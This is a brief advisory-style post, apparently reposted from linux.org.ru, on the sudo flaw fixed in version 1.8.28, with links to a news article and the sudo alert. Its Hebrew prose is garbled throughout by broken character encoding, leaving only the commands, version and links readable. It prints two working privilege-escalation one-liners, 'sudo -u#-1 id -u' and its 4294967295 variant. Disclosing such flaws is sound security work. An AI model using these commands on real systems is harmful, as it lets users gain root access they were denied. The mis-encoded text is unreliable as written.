ืคื’ื™ืขื•ืช ื‘ืกื•ื“ื•

ื‘ืื’ ื‘-sudo ืžืืคืฉืจ ืœืš ืœื”ืคืขื™ืœ ื›ืœ ืงื•ื‘ืฅ ื”ืคืขืœื” ื›-root ืื /etc/sudoers ืžืืคืฉืจ ืœื”ืคืขื™ืœ ืื•ืชื• ืขืœ ื™ื“ื™ ืžืฉืชืžืฉื™ื ืื—ืจื™ื ื•ื”ื•ื ืืกื•ืจ ืœ-root.

ื ื™ืฆื•ืœ ื”ืฉื’ื™ืื” ื”ื•ื ืคืฉื•ื˜ ืžืื•ื“:

sudo -u#-1 id -u

ืื•ึน:

sudo -u#4294967295 id -u

ื”ืฉื’ื™ืื” ืงื™ื™ืžืช ื‘ื›ืœ ื”ื’ื™ืจืกืื•ืช ืฉืœ sudo ืœืคื ื™ 1.8.28

ืคืจื˜ื™ื:

https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html


https://www.sudo.ws/alerts/minus_1_uid.html

ืžืงื•ืจ: linux.org.ru

ื”ื•ืกืคืช ืชื’ื•ื‘ื”